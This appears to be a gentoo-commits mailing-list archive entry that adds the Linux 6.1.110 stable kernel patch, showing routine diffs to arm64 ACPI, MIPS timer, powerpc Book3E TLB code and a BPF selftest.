++	# In case the previous file lacks a new line at the end
++	echo >> $TMP_FILE
+ 	cat $MERGE_FILE >> $TMP_FILE
+ done
+ 
+diff --git a/sound/soc/meson/axg-card.c b/sound/soc/meson/axg-card.c
+index cbbaa55d92a662..4553a1bb87d4a5 100644
+--- a/sound/soc/meson/axg-card.c
++++ b/sound/soc/meson/axg-card.c
+@@ -104,7 +104,7 @@ static int axg_card_add_tdm_loopback(struct snd_soc_card *card,
+ 				     int *index)
+ {
+ 	struct meson_card *priv = snd_soc_card_get_drvdata(card);
+-	struct snd_soc_dai_link *pad = &card->dai_link[*index];
++	struct snd_soc_dai_link *pad;
+ 	struct snd_soc_dai_link *lb;
+ 	struct snd_soc_dai_link_component *dlc;
+ 	int ret;
+@@ -114,6 +114,7 @@ static int axg_card_add_tdm_loopback(struct snd_soc_card *card,
+ 	if (ret)
+ 		return ret;
+ 
++	pad = &card->dai_link[*index];
+ 	lb = &card->dai_link[*index + 1];
+ 
+ 	lb->name = devm_kasprintf(card->dev, GFP_KERNEL, "%s-lb", pad->name);
+diff --git a/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c b/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
+index 2cf0c7a3fe2326..cef5d35951711b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
++++ b/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
+@@ -1909,7 +1909,7 @@ static void unix_inet_redir_to_connected(int family, int type, int sock_mapfd,
+ 	if (err)
+ 		return;
+ 
+-	if (socketpair(AF_UNIX, SOCK_DGRAM | SOCK_NONBLOCK, 0, sfd))
++	if (socketpair(AF_UNIX, type | SOCK_NONBLOCK, 0, sfd))
+ 		goto close_cli0;
+ 	c1 = sfd[0], p1 = sfd[1];
+ 
+@@ -1944,7 +1944,6 @@ static void unix_inet_redir_to_connected(int family, int type, int sock_mapfd,
+ close_cli0:
+ 	xclose(c0);
+ 	xclose(p0);
+-
+ }
+ 
+ static void unix_inet_skb_redir_to_connected(struct test_sockmap_listen *skel,


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-12 12:35 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-12 12:35 UTC (permalink / raw
  To: gentoo-commits

commit:     57035dc01a2c1fbdf35d763b5bdf0eda44657323
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Sep 12 12:35:27 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Sep 12 12:35:27 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=57035dc0

Linux patch 6.1.110

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1109_linux-6.1.110.patch | 7918 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7922 insertions(+)

diff --git a/0000_README b/0000_README
index 2deab4a3..4375fd0f 100644
--- a/0000_README
+++ b/0000_README
@@ -483,6 +483,10 @@ Patch:  1108_linux-6.1.109.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.109
 
+Patch:  1109_linux-6.1.110.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.110
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1109_linux-6.1.110.patch b/1109_linux-6.1.110.patch
new file mode 100644
index 00000000..f0832cb1
--- /dev/null
+++ b/1109_linux-6.1.110.patch
@@ -0,0 +1,7918 @@
+diff --git a/Makefile b/Makefile
+index 59c1ac88c57d9..0e055579c7211 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 109
++SUBLEVEL = 110
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/include/asm/acpi.h b/arch/arm64/include/asm/acpi.h
+index bd68e1b7f29f3..702587fda70cf 100644
+--- a/arch/arm64/include/asm/acpi.h
++++ b/arch/arm64/include/asm/acpi.h
+@@ -97,6 +97,18 @@ static inline u32 get_acpi_id_for_cpu(unsigned int cpu)
+ 	return	acpi_cpu_get_madt_gicc(cpu)->uid;
+ }
+ 
++static inline int get_cpu_for_acpi_id(u32 uid)
++{
++	int cpu;
++
++	for (cpu = 0; cpu < nr_cpu_ids; cpu++)
++		if (acpi_cpu_get_madt_gicc(cpu) &&
++		    uid == get_acpi_id_for_cpu(cpu))
++			return cpu;
++
++	return -EINVAL;
++}
++
+ static inline void arch_fix_phys_package_id(int num, u32 slot) { }
+ void __init acpi_init_cpus(void);
+ int apei_claim_sea(struct pt_regs *regs);
+diff --git a/arch/arm64/kernel/acpi_numa.c b/arch/arm64/kernel/acpi_numa.c
+index ccbff21ce1faf..2465f291c7e17 100644
+--- a/arch/arm64/kernel/acpi_numa.c
++++ b/arch/arm64/kernel/acpi_numa.c
+@@ -34,17 +34,6 @@ int __init acpi_numa_get_nid(unsigned int cpu)
+ 	return acpi_early_node_map[cpu];
+ }
+ 
+-static inline int get_cpu_for_acpi_id(u32 uid)
+-{
+-	int cpu;
+-
+-	for (cpu = 0; cpu < nr_cpu_ids; cpu++)
+-		if (uid == get_acpi_id_for_cpu(cpu))
+-			return cpu;
+-
+-	return -EINVAL;
+-}
+-
+ static int __init acpi_parse_gicc_pxm(union acpi_subtable_headers *header,
+ 				      const unsigned long end)
+ {
+diff --git a/arch/mips/kernel/cevt-r4k.c b/arch/mips/kernel/cevt-r4k.c
+index 32ec67c9ab67b..77028aa8c1073 100644
+--- a/arch/mips/kernel/cevt-r4k.c
++++ b/arch/mips/kernel/cevt-r4k.c
+@@ -303,13 +303,6 @@ int r4k_clockevent_init(void)
+ 	if (!c0_compare_int_usable())
+ 		return -ENXIO;
+ 
+-	/*
+-	 * With vectored interrupts things are getting platform specific.
+-	 * get_c0_compare_int is a hook to allow a platform to return the
+-	 * interrupt number of its liking.
+-	 */
+-	irq = get_c0_compare_int();
+-
+ 	cd = &per_cpu(mips_clockevent_device, cpu);
+ 
+ 	cd->name		= "MIPS";
+@@ -320,7 +313,6 @@ int r4k_clockevent_init(void)
+ 	min_delta		= calculate_min_delta();
+ 
+ 	cd->rating		= 300;
+-	cd->irq			= irq;
+ 	cd->cpumask		= cpumask_of(cpu);
+ 	cd->set_next_event	= mips_next_event;
+ 	cd->event_handler	= mips_event_handler;
+@@ -332,6 +324,13 @@ int r4k_clockevent_init(void)
+ 
+ 	cp0_timer_irq_installed = 1;
+ 
++	/*
++	 * With vectored interrupts things are getting platform specific.
++	 * get_c0_compare_int is a hook to allow a platform to return the
++	 * interrupt number of its liking.
++	 */
++	irq = get_c0_compare_int();
++
+ 	if (request_irq(irq, c0_compare_interrupt, flags, "timer",
+ 			c0_compare_interrupt))
+ 		pr_err("Failed to request irq %d (timer)\n", irq);
+diff --git a/arch/powerpc/include/asm/nohash/mmu-e500.h b/arch/powerpc/include/asm/nohash/mmu-e500.h
+index e43a418d3ccd0..9b5ba73d33d64 100644
+--- a/arch/powerpc/include/asm/nohash/mmu-e500.h
++++ b/arch/powerpc/include/asm/nohash/mmu-e500.h
+@@ -303,8 +303,7 @@ extern unsigned long linear_map_top;
+ extern int book3e_htw_mode;
+ 
+ #define PPC_HTW_NONE	0
+-#define PPC_HTW_IBM	1
+-#define PPC_HTW_E6500	2
++#define PPC_HTW_E6500	1
+ 
+ /*
+  * 64-bit booke platforms don't load the tlb in the tlb miss handler code.
+diff --git a/arch/powerpc/mm/nohash/Makefile b/arch/powerpc/mm/nohash/Makefile
+index f3894e79d5f70..24b445a5fcacc 100644
+--- a/arch/powerpc/mm/nohash/Makefile
++++ b/arch/powerpc/mm/nohash/Makefile
+@@ -3,7 +3,7 @@
+ ccflags-$(CONFIG_PPC64)	:= $(NO_MINIMAL_TOC)
+ 
+ obj-y				+= mmu_context.o tlb.o tlb_low.o kup.o
+-obj-$(CONFIG_PPC_BOOK3E_64)  	+= tlb_low_64e.o book3e_pgtable.o
++obj-$(CONFIG_PPC_BOOK3E_64)  	+= tlb_64e.o tlb_low_64e.o book3e_pgtable.o
+ obj-$(CONFIG_40x)		+= 40x.o
+ obj-$(CONFIG_44x)		+= 44x.o
+ obj-$(CONFIG_PPC_8xx)		+= 8xx.o
+diff --git a/arch/powerpc/mm/nohash/tlb.c b/arch/powerpc/mm/nohash/tlb.c
+index 2c15c86c70157..c0b643d30fcc2 100644
+--- a/arch/powerpc/mm/nohash/tlb.c
++++ b/arch/powerpc/mm/nohash/tlb.c
+@@ -110,28 +110,6 @@ struct mmu_psize_def mmu_psize_defs[MMU_PAGE_COUNT] = {
+ };
+ #endif
+ 
+-/* The variables below are currently only used on 64-bit Book3E
+- * though this will probably be made common with other nohash
+- * implementations at some point
+- */
+-#ifdef CONFIG_PPC64
+-
+-int mmu_pte_psize;		/* Page size used for PTE pages */
+-int mmu_vmemmap_psize;		/* Page size used for the virtual mem map */
+-int book3e_htw_mode;		/* HW tablewalk?  Value is PPC_HTW_* */
+-unsigned long linear_map_top;	/* Top of linear mapping */
+-
+-
+-/*
+- * Number of bytes to add to SPRN_SPRG_TLB_EXFRAME on crit/mcheck/debug
+- * exceptions.  This is used for bolted and e6500 TLB miss handlers which
+- * do not modify this SPRG in the TLB miss code; for other TLB miss handlers,
+- * this is set to zero.
+- */
+-int extlb_level_exc;
+-
+-#endif /* CONFIG_PPC64 */
+-
+ #ifdef CONFIG_PPC_E500
+ /* next_tlbcam_idx is used to round-robin tlbcam entry assignment */
+ DEFINE_PER_CPU(int, next_tlbcam_idx);
+@@ -361,381 +339,7 @@ void tlb_flush(struct mmu_gather *tlb)
+ 	flush_tlb_mm(tlb->mm);
+ }
+ 
+-/*
+- * Below are functions specific to the 64-bit variant of Book3E though that
+- * may change in the future
+- */
+-
+-#ifdef CONFIG_PPC64
+-
+-/*
+- * Handling of virtual linear page tables or indirect TLB entries
+- * flushing when PTE pages are freed
+- */
+-void tlb_flush_pgtable(struct mmu_gather *tlb, unsigned long address)
+-{
+-	int tsize = mmu_psize_defs[mmu_pte_psize].enc;
+-
+-	if (book3e_htw_mode != PPC_HTW_NONE) {
+-		unsigned long start = address & PMD_MASK;
+-		unsigned long end = address + PMD_SIZE;
+-		unsigned long size = 1UL << mmu_psize_defs[mmu_pte_psize].shift;
+-
+-		/* This isn't the most optimal, ideally we would factor out the
+-		 * while preempt & CPU mask mucking around, or even the IPI but
+-		 * it will do for now
+-		 */
+-		while (start < end) {
+-			__flush_tlb_page(tlb->mm, start, tsize, 1);
+-			start += size;
+-		}
+-	} else {
+-		unsigned long rmask = 0xf000000000000000ul;
+-		unsigned long rid = (address & rmask) | 0x1000000000000000ul;
+-		unsigned long vpte = address & ~rmask;
+-
+-		vpte = (vpte >> (PAGE_SHIFT - 3)) & ~0xffful;
+-		vpte |= rid;
+-		__flush_tlb_page(tlb->mm, vpte, tsize, 0);
+-	}
+-}
+-
+-static void __init setup_page_sizes(void)
+-{
+-	unsigned int tlb0cfg;
+-	unsigned int tlb0ps;
+-	unsigned int eptcfg;
+-	int i, psize;
+-
+-#ifdef CONFIG_PPC_E500
+-	unsigned int mmucfg = mfspr(SPRN_MMUCFG);
+-	int fsl_mmu = mmu_has_feature(MMU_FTR_TYPE_FSL_E);
+-
+-	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V1) {
+-		unsigned int tlb1cfg = mfspr(SPRN_TLB1CFG);
+-		unsigned int min_pg, max_pg;
+-
+-		min_pg = (tlb1cfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT;
+-		max_pg = (tlb1cfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT;
+-
+-		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-			struct mmu_psize_def *def;
+-			unsigned int shift;
+-
+-			def = &mmu_psize_defs[psize];
+-			shift = def->shift;
+-
+-			if (shift == 0 || shift & 1)
+-				continue;
+-
+-			/* adjust to be in terms of 4^shift Kb */
+-			shift = (shift - 10) >> 1;
+-
+-			if ((shift >= min_pg) && (shift <= max_pg))
+-				def->flags |= MMU_PAGE_SIZE_DIRECT;
+-		}
+-
+-		goto out;
+-	}
+-
+-	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V2) {
+-		u32 tlb1cfg, tlb1ps;
+-
+-		tlb0cfg = mfspr(SPRN_TLB0CFG);
+-		tlb1cfg = mfspr(SPRN_TLB1CFG);
+-		tlb1ps = mfspr(SPRN_TLB1PS);
+-		eptcfg = mfspr(SPRN_EPTCFG);
+-
+-		if ((tlb1cfg & TLBnCFG_IND) && (tlb0cfg & TLBnCFG_PT))
+-			book3e_htw_mode = PPC_HTW_E6500;
+-
+-		/*
+-		 * We expect 4K subpage size and unrestricted indirect size.
+-		 * The lack of a restriction on indirect size is a Freescale
+-		 * extension, indicated by PSn = 0 but SPSn != 0.
+-		 */
+-		if (eptcfg != 2)
+-			book3e_htw_mode = PPC_HTW_NONE;
+-
+-		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-			struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-			if (!def->shift)
+-				continue;
+-
+-			if (tlb1ps & (1U << (def->shift - 10))) {
+-				def->flags |= MMU_PAGE_SIZE_DIRECT;
+-
+-				if (book3e_htw_mode && psize == MMU_PAGE_2M)
+-					def->flags |= MMU_PAGE_SIZE_INDIRECT;
+-			}
+-		}
+-
+-		goto out;
+-	}
+-#endif
+-
+-	tlb0cfg = mfspr(SPRN_TLB0CFG);
+-	tlb0ps = mfspr(SPRN_TLB0PS);
+-	eptcfg = mfspr(SPRN_EPTCFG);
+-
+-	/* Look for supported direct sizes */
+-	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-		struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-		if (tlb0ps & (1U << (def->shift - 10)))
+-			def->flags |= MMU_PAGE_SIZE_DIRECT;
+-	}
+-
+-	/* Indirect page sizes supported ? */
+-	if ((tlb0cfg & TLBnCFG_IND) == 0 ||
+-	    (tlb0cfg & TLBnCFG_PT) == 0)
+-		goto out;
+-
+-	book3e_htw_mode = PPC_HTW_IBM;
+-
+-	/* Now, we only deal with one IND page size for each
+-	 * direct size. Hopefully all implementations today are
+-	 * unambiguous, but we might want to be careful in the
+-	 * future.
+-	 */
+-	for (i = 0; i < 3; i++) {
+-		unsigned int ps, sps;
+-
+-		sps = eptcfg & 0x1f;
+-		eptcfg >>= 5;
+-		ps = eptcfg & 0x1f;
+-		eptcfg >>= 5;
+-		if (!ps || !sps)
+-			continue;
+-		for (psize = 0; psize < MMU_PAGE_COUNT; psize++) {
+-			struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-			if (ps == (def->shift - 10))
+-				def->flags |= MMU_PAGE_SIZE_INDIRECT;
+-			if (sps == (def->shift - 10))
+-				def->ind = ps + 10;
+-		}
+-	}
+-
+-out:
+-	/* Cleanup array and print summary */
+-	pr_info("MMU: Supported page sizes\n");
+-	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-		struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-		const char *__page_type_names[] = {
+-			"unsupported",
+-			"direct",
+-			"indirect",
+-			"direct & indirect"
+-		};
+-		if (def->flags == 0) {
+-			def->shift = 0;	
+-			continue;
+-		}
+-		pr_info("  %8ld KB as %s\n", 1ul << (def->shift - 10),
+-			__page_type_names[def->flags & 0x3]);
+-	}
+-}
+-
+-static void __init setup_mmu_htw(void)
+-{
+-	/*
+-	 * If we want to use HW tablewalk, enable it by patching the TLB miss
+-	 * handlers to branch to the one dedicated to it.
+-	 */
+-
+-	switch (book3e_htw_mode) {
+-	case PPC_HTW_IBM:
+-		patch_exception(0x1c0, exc_data_tlb_miss_htw_book3e);
+-		patch_exception(0x1e0, exc_instruction_tlb_miss_htw_book3e);
+-		break;
+-#ifdef CONFIG_PPC_E500
+-	case PPC_HTW_E6500:
+-		extlb_level_exc = EX_TLB_SIZE;
+-		patch_exception(0x1c0, exc_data_tlb_miss_e6500_book3e);
+-		patch_exception(0x1e0, exc_instruction_tlb_miss_e6500_book3e);
+-		break;
+-#endif
+-	}
+-	pr_info("MMU: Book3E HW tablewalk %s\n",
+-		book3e_htw_mode != PPC_HTW_NONE ? "enabled" : "not supported");
+-}
+-
+-/*
+- * Early initialization of the MMU TLB code
+- */
+-static void early_init_this_mmu(void)
+-{
+-	unsigned int mas4;
+-
+-	/* Set MAS4 based on page table setting */
+-
+-	mas4 = 0x4 << MAS4_WIMGED_SHIFT;
+-	switch (book3e_htw_mode) {
+-	case PPC_HTW_E6500:
+-		mas4 |= MAS4_INDD;
+-		mas4 |= BOOK3E_PAGESZ_2M << MAS4_TSIZED_SHIFT;
+-		mas4 |= MAS4_TLBSELD(1);
+-		mmu_pte_psize = MMU_PAGE_2M;
+-		break;
+-
+-	case PPC_HTW_IBM:
+-		mas4 |= MAS4_INDD;
+-		mas4 |=	BOOK3E_PAGESZ_1M << MAS4_TSIZED_SHIFT;
+-		mmu_pte_psize = MMU_PAGE_1M;
+-		break;
+-
+-	case PPC_HTW_NONE:
+-		mas4 |=	BOOK3E_PAGESZ_4K << MAS4_TSIZED_SHIFT;
+-		mmu_pte_psize = mmu_virtual_psize;
+-		break;
+-	}
+-	mtspr(SPRN_MAS4, mas4);
+-
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		unsigned int num_cams;
+-		bool map = true;
+-
+-		/* use a quarter of the TLBCAM for bolted linear map */
+-		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
+-
+-		/*
+-		 * Only do the mapping once per core, or else the
+-		 * transient mapping would cause problems.
+-		 */
+-#ifdef CONFIG_SMP
+-		if (hweight32(get_tensr()) > 1)
+-			map = false;
+-#endif
+-
+-		if (map)
+-			linear_map_top = map_mem_in_cams(linear_map_top,
+-							 num_cams, false, true);
+-	}
+-#endif
+-
+-	/* A sync won't hurt us after mucking around with
+-	 * the MMU configuration
+-	 */
+-	mb();
+-}
+-
+-static void __init early_init_mmu_global(void)
+-{
+-	/* XXX This should be decided at runtime based on supported
+-	 * page sizes in the TLB, but for now let's assume 16M is
+-	 * always there and a good fit (which it probably is)
+-	 *
+-	 * Freescale booke only supports 4K pages in TLB0, so use that.
+-	 */
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E))
+-		mmu_vmemmap_psize = MMU_PAGE_4K;
+-	else
+-		mmu_vmemmap_psize = MMU_PAGE_16M;
+-
+-	/* XXX This code only checks for TLB 0 capabilities and doesn't
+-	 *     check what page size combos are supported by the HW. It
+-	 *     also doesn't handle the case where a separate array holds
+-	 *     the IND entries from the array loaded by the PT.
+-	 */
+-	/* Look for supported page sizes */
+-	setup_page_sizes();
+-
+-	/* Look for HW tablewalk support */
+-	setup_mmu_htw();
+-
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		if (book3e_htw_mode == PPC_HTW_NONE) {
+-			extlb_level_exc = EX_TLB_SIZE;
+-			patch_exception(0x1c0, exc_data_tlb_miss_bolted_book3e);
+-			patch_exception(0x1e0,
+-				exc_instruction_tlb_miss_bolted_book3e);
+-		}
+-	}
+-#endif
+-
+-	/* Set the global containing the top of the linear mapping
+-	 * for use by the TLB miss code
+-	 */
+-	linear_map_top = memblock_end_of_DRAM();
+-
+-	ioremap_bot = IOREMAP_BASE;
+-}
+-
+-static void __init early_mmu_set_memory_limit(void)
+-{
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		/*
+-		 * Limit memory so we dont have linear faults.
+-		 * Unlike memblock_set_current_limit, which limits
+-		 * memory available during early boot, this permanently
+-		 * reduces the memory available to Linux.  We need to
+-		 * do this because highmem is not supported on 64-bit.
+-		 */
+-		memblock_enforce_memory_limit(linear_map_top);
+-	}
+-#endif
+-
+-	memblock_set_current_limit(linear_map_top);
+-}
+-
+-/* boot cpu only */
+-void __init early_init_mmu(void)
+-{
+-	early_init_mmu_global();
+-	early_init_this_mmu();
+-	early_mmu_set_memory_limit();
+-}
+-
+-void early_init_mmu_secondary(void)
+-{
+-	early_init_this_mmu();
+-}
+-
+-void setup_initial_memory_limit(phys_addr_t first_memblock_base,
+-				phys_addr_t first_memblock_size)
+-{
+-	/* On non-FSL Embedded 64-bit, we adjust the RMA size to match
+-	 * the bolted TLB entry. We know for now that only 1G
+-	 * entries are supported though that may eventually
+-	 * change.
+-	 *
+-	 * on FSL Embedded 64-bit, usually all RAM is bolted, but with
+-	 * unusual memory sizes it's possible for some RAM to not be mapped
+-	 * (such RAM is not used at all by Linux, since we don't support
+-	 * highmem on 64-bit).  We limit ppc64_rma_size to what would be
+-	 * mappable if this memblock is the only one.  Additional memblocks
+-	 * can only increase, not decrease, the amount that ends up getting
+-	 * mapped.  We still limit max to 1G even if we'll eventually map
+-	 * more.  This is due to what the early init code is set up to do.
+-	 *
+-	 * We crop it to the size of the first MEMBLOCK to
+-	 * avoid going over total available memory just in case...
+-	 */
+-#ifdef CONFIG_PPC_E500
+-	if (early_mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		unsigned long linear_sz;
+-		unsigned int num_cams;
+-
+-		/* use a quarter of the TLBCAM for bolted linear map */
+-		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
+-
+-		linear_sz = map_mem_in_cams(first_memblock_size, num_cams,
+-					    true, true);
+-
+-		ppc64_rma_size = min_t(u64, linear_sz, 0x40000000);
+-	} else
+-#endif
+-		ppc64_rma_size = min_t(u64, first_memblock_size, 0x40000000);
+-
+-	/* Finally limit subsequent allocations */
+-	memblock_set_current_limit(first_memblock_base + ppc64_rma_size);
+-}
+-#else /* ! CONFIG_PPC64 */
++#ifndef CONFIG_PPC64
+ void __init early_init_mmu(void)
+ {
+ #ifdef CONFIG_PPC_47x
+diff --git a/arch/powerpc/mm/nohash/tlb_64e.c b/arch/powerpc/mm/nohash/tlb_64e.c
+new file mode 100644
+index 0000000000000..b6af3ec4d001d
+--- /dev/null
++++ b/arch/powerpc/mm/nohash/tlb_64e.c
+@@ -0,0 +1,361 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Copyright 2008,2009 Ben Herrenschmidt <benh@kernel.crashing.org>
++ *                     IBM Corp.
++ *
++ *  Derived from arch/ppc/mm/init.c:
++ *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
++ *
++ *  Modifications by Paul Mackerras (PowerMac) (paulus@cs.anu.edu.au)
++ *  and Cort Dougan (PReP) (cort@cs.nmt.edu)
++ *    Copyright (C) 1996 Paul Mackerras
++ *
++ *  Derived from "arch/i386/mm/init.c"
++ *    Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
++ */
++
++#include <linux/kernel.h>
++#include <linux/export.h>
++#include <linux/mm.h>
++#include <linux/init.h>
++#include <linux/pagemap.h>
++#include <linux/memblock.h>
++
++#include <asm/pgalloc.h>
++#include <asm/tlbflush.h>
++#include <asm/tlb.h>
++#include <asm/code-patching.h>
++#include <asm/cputhreads.h>
++
++#include <mm/mmu_decl.h>
++
++/* The variables below are currently only used on 64-bit Book3E
++ * though this will probably be made common with other nohash
++ * implementations at some point
++ */
++static int mmu_pte_psize;	/* Page size used for PTE pages */
++int mmu_vmemmap_psize;		/* Page size used for the virtual mem map */
++int book3e_htw_mode;		/* HW tablewalk?  Value is PPC_HTW_* */
++unsigned long linear_map_top;	/* Top of linear mapping */
++
++
++/*
++ * Number of bytes to add to SPRN_SPRG_TLB_EXFRAME on crit/mcheck/debug
++ * exceptions.  This is used for bolted and e6500 TLB miss handlers which
++ * do not modify this SPRG in the TLB miss code; for other TLB miss handlers,
++ * this is set to zero.
++ */
++int extlb_level_exc;
++
++/*
++ * Handling of virtual linear page tables or indirect TLB entries
++ * flushing when PTE pages are freed
++ */
++void tlb_flush_pgtable(struct mmu_gather *tlb, unsigned long address)
++{
++	int tsize = mmu_psize_defs[mmu_pte_psize].enc;
++
++	if (book3e_htw_mode != PPC_HTW_NONE) {
++		unsigned long start = address & PMD_MASK;
++		unsigned long end = address + PMD_SIZE;
++		unsigned long size = 1UL << mmu_psize_defs[mmu_pte_psize].shift;
++
++		/* This isn't the most optimal, ideally we would factor out the
++		 * while preempt & CPU mask mucking around, or even the IPI but
++		 * it will do for now
++		 */
++		while (start < end) {
++			__flush_tlb_page(tlb->mm, start, tsize, 1);
++			start += size;
++		}
++	} else {
++		unsigned long rmask = 0xf000000000000000ul;
++		unsigned long rid = (address & rmask) | 0x1000000000000000ul;
++		unsigned long vpte = address & ~rmask;
++
++		vpte = (vpte >> (PAGE_SHIFT - 3)) & ~0xffful;
++		vpte |= rid;
++		__flush_tlb_page(tlb->mm, vpte, tsize, 0);
++	}
++}
++
++static void __init setup_page_sizes(void)
++{
++	unsigned int tlb0cfg;
++	unsigned int eptcfg;
++	int psize;
++
++#ifdef CONFIG_PPC_E500
++	unsigned int mmucfg = mfspr(SPRN_MMUCFG);
++	int fsl_mmu = mmu_has_feature(MMU_FTR_TYPE_FSL_E);
++
++	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V1) {
++		unsigned int tlb1cfg = mfspr(SPRN_TLB1CFG);
++		unsigned int min_pg, max_pg;
++
++		min_pg = (tlb1cfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT;
++		max_pg = (tlb1cfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT;
++
++		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++			struct mmu_psize_def *def;
++			unsigned int shift;
++
++			def = &mmu_psize_defs[psize];
++			shift = def->shift;
++
++			if (shift == 0 || shift & 1)
++				continue;
++
++			/* adjust to be in terms of 4^shift Kb */
++			shift = (shift - 10) >> 1;
++
++			if ((shift >= min_pg) && (shift <= max_pg))
++				def->flags |= MMU_PAGE_SIZE_DIRECT;
++		}
++
++		goto out;
++	}
++
++	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V2) {
++		u32 tlb1cfg, tlb1ps;
++
++		tlb0cfg = mfspr(SPRN_TLB0CFG);
++		tlb1cfg = mfspr(SPRN_TLB1CFG);
++		tlb1ps = mfspr(SPRN_TLB1PS);
++		eptcfg = mfspr(SPRN_EPTCFG);
++
++		if ((tlb1cfg & TLBnCFG_IND) && (tlb0cfg & TLBnCFG_PT))
++			book3e_htw_mode = PPC_HTW_E6500;
++
++		/*
++		 * We expect 4K subpage size and unrestricted indirect size.
++		 * The lack of a restriction on indirect size is a Freescale
++		 * extension, indicated by PSn = 0 but SPSn != 0.
++		 */
++		if (eptcfg != 2)
++			book3e_htw_mode = PPC_HTW_NONE;
++
++		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++			struct mmu_psize_def *def = &mmu_psize_defs[psize];
++
++			if (!def->shift)
++				continue;
++
++			if (tlb1ps & (1U << (def->shift - 10))) {
++				def->flags |= MMU_PAGE_SIZE_DIRECT;
++
++				if (book3e_htw_mode && psize == MMU_PAGE_2M)
++					def->flags |= MMU_PAGE_SIZE_INDIRECT;
++			}
++		}
++
++		goto out;
++	}
++#endif
++out:
++	/* Cleanup array and print summary */
++	pr_info("MMU: Supported page sizes\n");
++	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++		struct mmu_psize_def *def = &mmu_psize_defs[psize];
++		const char *__page_type_names[] = {
++			"unsupported",
++			"direct",
++			"indirect",
++			"direct & indirect"
++		};
++		if (def->flags == 0) {
++			def->shift = 0;
++			continue;
++		}
++		pr_info("  %8ld KB as %s\n", 1ul << (def->shift - 10),
++			__page_type_names[def->flags & 0x3]);
++	}
++}
++
++static void __init setup_mmu_htw(void)
++{
++	/*
++	 * If we want to use HW tablewalk, enable it by patching the TLB miss
++	 * handlers to branch to the one dedicated to it.
++	 */
++
++	switch (book3e_htw_mode) {
++#ifdef CONFIG_PPC_E500
++	case PPC_HTW_E6500:
++		extlb_level_exc = EX_TLB_SIZE;
++		patch_exception(0x1c0, exc_data_tlb_miss_e6500_book3e);
++		patch_exception(0x1e0, exc_instruction_tlb_miss_e6500_book3e);
++		break;
++#endif
++	}
++	pr_info("MMU: Book3E HW tablewalk %s\n",
++		book3e_htw_mode != PPC_HTW_NONE ? "enabled" : "not supported");
++}
++
++/*
++ * Early initialization of the MMU TLB code
++ */
++static void early_init_this_mmu(void)
++{
++	unsigned int mas4;
++
++	/* Set MAS4 based on page table setting */
++
++	mas4 = 0x4 << MAS4_WIMGED_SHIFT;
++	switch (book3e_htw_mode) {
++	case PPC_HTW_E6500:
++		mas4 |= MAS4_INDD;
++		mas4 |= BOOK3E_PAGESZ_2M << MAS4_TSIZED_SHIFT;
++		mas4 |= MAS4_TLBSELD(1);
++		mmu_pte_psize = MMU_PAGE_2M;
++		break;
++
++	case PPC_HTW_NONE:
++		mas4 |=	BOOK3E_PAGESZ_4K << MAS4_TSIZED_SHIFT;
++		mmu_pte_psize = mmu_virtual_psize;
++		break;
++	}
++	mtspr(SPRN_MAS4, mas4);
++
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		unsigned int num_cams;
++		bool map = true;
++
